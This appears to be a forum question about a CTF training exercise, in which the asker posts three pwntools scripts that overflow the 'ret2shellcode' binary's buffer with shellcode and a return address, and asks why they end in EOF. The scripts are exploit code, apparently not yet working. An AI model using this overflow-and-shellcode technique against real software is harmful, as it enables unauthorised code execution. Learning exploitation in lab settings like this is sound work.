# Got EOF while sending in interactive，How can I solve it?

Tags: pwntools

Position: https://github.com/ctf-wiki/ctf-wiki/blob/master/docs/zh/docs/pwn/linux/user-mode/stackoverflow/x86/basic-rop.md

It provides a program named `ret2shellcode`. I try to pwn it, but I failed. I have tried two ways, execute in .bss, execute in stack. But, I just get the information below:

[image]

The OS environment and program information is as following:

[image]
[image]

And, I find that:.bss don't have execute permission

[image]

Exploit code:

Execute in (stack frame of entry0/_start)

```
#!/usr/bin/env python
from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
sh.interactive()
```

Execute in buf (main function stack frame):

```
from pwn import *

sh = process("./ret2shellcode")

payload = asm(shellcraft.sh())
buf = 0xffffcecc

sh.sendline(payload.ljust(112, b'A') + p32(buf))
sh.interactive()
```

Execute in buf2 (.bss):

```
from pwn import *                                                                                               
 
sh = process('./ret2shellcode')
 
payload = asm(shellcraft.sh())
 
sled_len =  112 
ret_addr = 0xffffcf40
 
play_load2 = 112*b'A' + p32(ret_addr) + payload 
 
sh.sendline(play_load2)
sh.interactive()
```

Comment: Can you print your shellcode and check if it contains null bytes in it. From error it looks like you are hitting EoF.